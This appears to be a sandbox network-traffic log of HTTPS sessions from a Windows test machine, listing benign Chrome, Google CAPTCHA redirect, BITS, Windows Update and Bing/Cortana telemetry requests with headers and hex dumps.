                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549705142.251.40.1004434332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:20 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                            Host: www.google.com
                                                            Connection: keep-alive
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-05-02 13:56:21 UTC1248INHTTP/1.1 302 Found
                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGIS3zrEGIjC0v607c_qYvTi5H8NDS3aYuCJmplAqD5Rl0JeJ4_KibV6kPGTEw6xAv1H63aOy6jsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                            x-hallmonitor-challenge: CgsIhbfOsQYQm9uoWBIEv2CW4Q
                                                            Content-Type: text/html; charset=UTF-8
                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                            Permissions-Policy: unload=()
                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                            Date: Thu, 02 May 2024 13:56:21 GMT
                                                            Server: gws
                                                            Content-Length: 417
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            Set-Cookie: 1P_JAR=2024-05-02-13; expires=Sat, 01-Jun-2024 13:56:21 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                            Set-Cookie: NID=513=kUszvrnp6L6qkzmjnXT8tKxx3ftCnD_6dpqXT5ipG2-oWiOp0NvDcpVBh2C9JkKo8BLayWIpOpc7ZV6jBbijWa6Kaf9YhwSa0O26wBZFBNJ72vCB0pwahmofUaZfvgUD1reQRrLBhzwF9OIRNktjvtbSUw_lRTOAA6eV1N7C-ys; expires=Fri, 01-Nov-2024 13:56:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-05-02 13:56:21 UTC7INData Raw: 3c 48 54 4d 4c 3e 3c
                                                            Data Ascii: <HTML><
                                                            2024-05-02 13:56:21 UTC410INData Raw: 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 61 6d 70 3b 71 3d 45
                                                            Data Ascii: HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&amp;q=E


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549712142.251.40.1004434332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:21 UTC920OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGIS3zrEGIjAy2SY_wKQfS3Qr9DIp4alnyJkCTUiOIWFLBr4l8U2O7-X7PjrHl9WYNHcJAlxWu-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                            Host: www.google.com
                                                            Connection: keep-alive
                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: 1P_JAR=2024-05-02-13; NID=513=kagEDjFykvKoAP0yl0sL1kceCdSlsxq38rbJXvvayh012PxpNNXfpbKkzAh7U8g-UcB5j8kSKnHvFbFlm_drDhRUplG0u-yRqpVq4Bp0PrYa_i3zve2NFSHgx-VHdiOxzy44Flbipwim5igaZ1Atm6f83h90MBFNiD0xnZ1XgEU
                                                            2024-05-02 13:56:21 UTC356INHTTP/1.1 429 Too Many Requests
                                                            Date: Thu, 02 May 2024 13:56:21 GMT
                                                            Pragma: no-cache
                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Content-Type: text/html
                                                            Server: HTTP server (unknown)
                                                            Content-Length: 3185
                                                            X-XSS-Protection: 0
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-05-02 13:56:21 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                            2024-05-02 13:56:21 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 4e 36 58 64 65 4b 62 4f 2d
                                                            Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="N6XdeKbO-
                                                            2024-05-02 13:56:21 UTC1031INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                            Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549713142.251.40.1004434332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:21 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGIS3zrEGIjC0v607c_qYvTi5H8NDS3aYuCJmplAqD5Rl0JeJ4_KibV6kPGTEw6xAv1H63aOy6jsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                            Host: www.google.com
                                                            Connection: keep-alive
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: 1P_JAR=2024-05-02-13; NID=513=kUszvrnp6L6qkzmjnXT8tKxx3ftCnD_6dpqXT5ipG2-oWiOp0NvDcpVBh2C9JkKo8BLayWIpOpc7ZV6jBbijWa6Kaf9YhwSa0O26wBZFBNJ72vCB0pwahmofUaZfvgUD1reQRrLBhzwF9OIRNktjvtbSUw_lRTOAA6eV1N7C-ys
                                                            2024-05-02 13:56:21 UTC356INHTTP/1.1 429 Too Many Requests
                                                            Date: Thu, 02 May 2024 13:56:21 GMT
                                                            Pragma: no-cache
                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Content-Type: text/html
                                                            Server: HTTP server (unknown)
                                                            Content-Length: 3113
                                                            X-XSS-Protection: 0
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-05-02 13:56:21 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                            2024-05-02 13:56:21 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 6b 42 38 7a 6e 52 71 4e 36 56 44 54 56 49 41 75 64 36 2d 69 66 30 43 55 6b 45 55 50 41 4d 6f 43 34
                                                            Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="kB8znRqN6VDTVIAud6-if0CUkEUPAMoC4
                                                            2024-05-02 13:56:21 UTC959INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                            Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549719104.118.8.139443
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:30 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            Accept-Encoding: identity
                                                            User-Agent: Microsoft BITS/7.8
                                                            Host: fs.microsoft.com
                                                            2024-05-02 13:56:31 UTC466INHTTP/1.1 200 OK
                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                            Content-Type: application/octet-stream
                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                            Server: ECAcc (chd/073D)
                                                            X-CID: 11
                                                            X-Ms-ApiVersion: Distribute 1.2
                                                            X-Ms-Region: prod-eus-z1
                                                            Cache-Control: public, max-age=61628
                                                            Date: Thu, 02 May 2024 13:56:30 GMT
                                                            Connection: close
                                                            X-CID: 2


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549720104.118.8.139443
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:31 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            Accept-Encoding: identity
                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                            Range: bytes=0-2147483646
                                                            User-Agent: Microsoft BITS/7.8
                                                            Host: fs.microsoft.com
                                                            2024-05-02 13:56:31 UTC530INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                            ApiVersion: Distribute 1.1
                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                            X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                            Cache-Control: public, max-age=61637
                                                            Date: Thu, 02 May 2024 13:56:31 GMT
                                                            Content-Length: 55
                                                            Connection: close
                                                            X-CID: 2
                                                            2024-05-02 13:56:31 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.54972120.12.23.50443
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:32 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vPOR2YTmsL7R8cO&MD=bTcn1Cz5 HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                            Host: slscr.update.microsoft.com
                                                            2024-05-02 13:56:32 UTC560INHTTP/1.1 200 OK
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Content-Type: application/octet-stream
                                                            Expires: -1
                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                            MS-CorrelationId: 8588c004-0779-4acf-a563-8dbf37af242c
                                                            MS-RequestId: 6f0bc4b3-d792-4629-b2c0-19f625de3711
                                                            MS-CV: /UFimhwaYkSoiapg.0
                                                            X-Microsoft-SLSClientCache: 2880
                                                            Content-Disposition: attachment; filename=environment.cab
                                                            X-Content-Type-Options: nosniff
                                                            Date: Thu, 02 May 2024 13:56:32 GMT
                                                            Connection: close
                                                            Content-Length: 24490
                                                            2024-05-02 13:56:32 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                            2024-05-02 13:56:32 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            9192.168.2.54972523.1.237.91443
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 13:56:35 UTC2148OUTPOST /threshold/xls.aspx HTTP/1.1
                                                            Origin: https://www.bing.com
                                                            Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                            Accept: */*
                                                            Accept-Language: en-CH
                                                            Content-type: text/xml
                                                            X-Agent-DeviceId: 01000A410900D492
                                                            X-BM-CBT: 1696428841
                                                            X-BM-DateFormat: dd/MM/yyyy
                                                            X-BM-DeviceDimensions: 784x984
                                                            X-BM-DeviceDimensionsLogical: 784x984
                                                            X-BM-DeviceScale: 100
                                                            X-BM-DTZ: 120
                                                            X-BM-Market: CH
                                                            X-BM-Theme: 000000;0078d7
                                                            X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                            X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                            X-Device-isOptin: false
                                                            X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                            X-Device-OSSKU: 48
                                                            X-Device-Touch: false
                                                            X-DeviceID: 01000A410900D492
                                                            X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                            X-MSEdge-ExternalExpType: JointCoord
                                                            X-PositionerType: Desktop
                                                            X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                            X-Search-CortanaAvailableCapabilities: None
                                                            X-Search-SafeSearch: Moderate
                                                            X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                            X-UserAgeClass: Unknown
                                                            Accept-Encoding: gzip, deflate, br
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                            Host: www.bing.com
                                                            Content-Length: 2484
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714658161007&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                            2024-05-02 13:56:35 UTC1OUTData Raw: 3c
                                                            Data Ascii: <
                                                            2024-05-02 13:56:35 UTC2483OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                            Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                            2024-05-02 13:56:35 UTC475INHTTP/1.1 204 No Content
                                                            Access-Control-Allow-Origin: *
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            X-MSEdge-Ref: Ref A: DC8980114BBB4468AF76577DEF55E614 Ref B: PAOEDGE0608 Ref C: 2024-05-02T13:56:35Z
                                                            Date: Thu, 02 May 2024 13:56:35 GMT
